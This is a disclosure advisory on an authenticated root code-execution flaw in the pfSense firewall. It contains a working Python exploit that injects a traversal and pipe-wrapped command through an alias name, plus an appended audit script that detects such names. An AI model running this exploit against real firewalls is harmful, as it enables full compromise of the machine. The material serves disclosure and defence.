SSD Advisory – pfSense Post Auth RCE


A vulnerability in pfSense allows authenticated users to cause the product to execute arbitrary code; this in turn would allow an attacker to compromise the machine on which pfSense is installed.

Vulnerability Summary

Due to the way pfSense, an open-source firewall, handles the names of rules, an authenticated attacker who is able to modify firewall rules can cause the firewall to execute arbitrary code. The code runs with elevated privileges (root), allowing full compromise of the machine on which pfSense is running.


An independent security researcher, 이예랑 (@yelang123x), has reported this to the SSD Secure Disclosure program.

Vendor Response

The vendor has issued two fixes:

Fix 1:

Fix 2:


import requests
from bs4 import BeautifulSoup

url = 'https://x.y.z.a/'
session = requests.session()
username = input('id : ')
passwd = input('passwd : ')
cmd = input('cmd : ')  # the command must not contain "/", e.g.: echo pwn > test.php

if '/' in cmd:
    exit("'/' is not allowed")

def csrf_token(url=url):
    # fetch a page and pull the csrfMagicToken value out of the inline script
    result = session.get(url, verify=False)
    soup = BeautifulSoup(result.text, 'html.parser')
    csrf = soup.find_all(['script'])[2].decode()
    csrf_text = csrf[csrf.find('var csrfMagicToken = "') +
                     22:csrf.find('";var csrfMagicName')].split(',')
    return csrf_text[0] + ',' + csrf_text[1]

def login():
    data = {"usernamefld": username, "passwordfld": passwd,
            "login": "Sign In", "__csrf_magic": csrf_token()}
    # the post target was lost in the original listing; the base URL, which
    # serves the login form, is assumed here
    login = session.post(url, data=data, verify=False)

def add_gadget():
    # the alias name carries the traversal and the pipe-wrapped command
    add_url = url + 'firewall_aliases_edit.php?tab=ip'
    data = {
        "__csrf_magic": csrf_token(),
        "name": '../../../tmp/rules.packages.|' + cmd + '|',
        "descr": "sadf",
        "type": "urltable",
        "address0": "",
        "address_subnet0": "128",
        "detail0": "",
        "tab": "ip",
        "origname": "",
        "save": "Saved"
    }
    result = session.post(add_url, data=data, verify=False)

def run_exec():
    # loading the status page triggers the rule reload that runs the command
    result = session.get(url + 'status.php')
    if result.text.find('pfSense: Status') != -1:
        return 'success'
    else:
        return 'failed'
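As an added defensive check (not part of the advisory or of pfSense itself), the audit below walks the alias entries of a pfSense config.xml backup and flags alias names that contain path separators, parent-directory traversal or shell metacharacters, i.e. the shape of the name the proof of concept submits. The allowlist pattern for a "plain" alias name and the config.xml element layout are assumptions; the sample configuration is constructed.

```python
import re
import xml.etree.ElementTree as ET

# Assumed allowlist for a plain alias name (identifier-like); not a rule quoted from pfSense.
ALIAS_NAME_RE = re.compile(r'^[A-Za-z_][A-Za-z0-9_]*$')

# Tokens that let a name escape its intended path or turn into a shell command,
# as in the advisory's payload shape '../../../tmp/rules.packages.|cmd|'.
SUSPICIOUS = {
    '/': 'path separator',
    '..': 'parent-directory traversal',
    '|': 'shell pipe',
    ';': 'command separator',
    '`': 'command substitution',
    '$': 'variable or command expansion',
    '&': 'background or chaining operator',
}

def name_findings(name: str) -> list:
    """Return the reasons an alias name fails the allowlist; an empty list means it is clean."""
    if ALIAS_NAME_RE.match(name):
        return []
    reasons = [why for token, why in SUSPICIOUS.items() if token in name]
    return reasons or ['not a plain identifier']

def audit_aliases(config_xml: str) -> dict:
    """Walk <aliases><alias><name> entries (assumed layout) and map unsafe names to findings."""
    root = ET.fromstring(config_xml)
    flagged = {}
    for alias in root.iter('alias'):
        name = (alias.findtext('name') or '').strip()
        reasons = name_findings(name)
        if reasons:
            flagged[name] = reasons
    return flagged

# Constructed sample: one benign alias and one carrying the advisory's payload shape.
SAMPLE_CONFIG = """<?xml version="1.0"?>
<pfsense>
  <aliases>
    <alias><name>web_servers</name><type>host</type><address>10.0.0.5</address></alias>
    <alias><name>../../../tmp/rules.packages.|cmd|</name><type>urltable</type><url>http://example.invalid/list.txt</url></alias>
  </aliases>
</pfsense>
"""

if __name__ == '__main__':
    for name, reasons in audit_aliases(SAMPLE_CONFIG).items():
        print(f'{name!r}: {", ".join(reasons)}')
```

Run it against an exported config.xml to spot alias names that should never have been accepted; a clean configuration yields an empty result.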
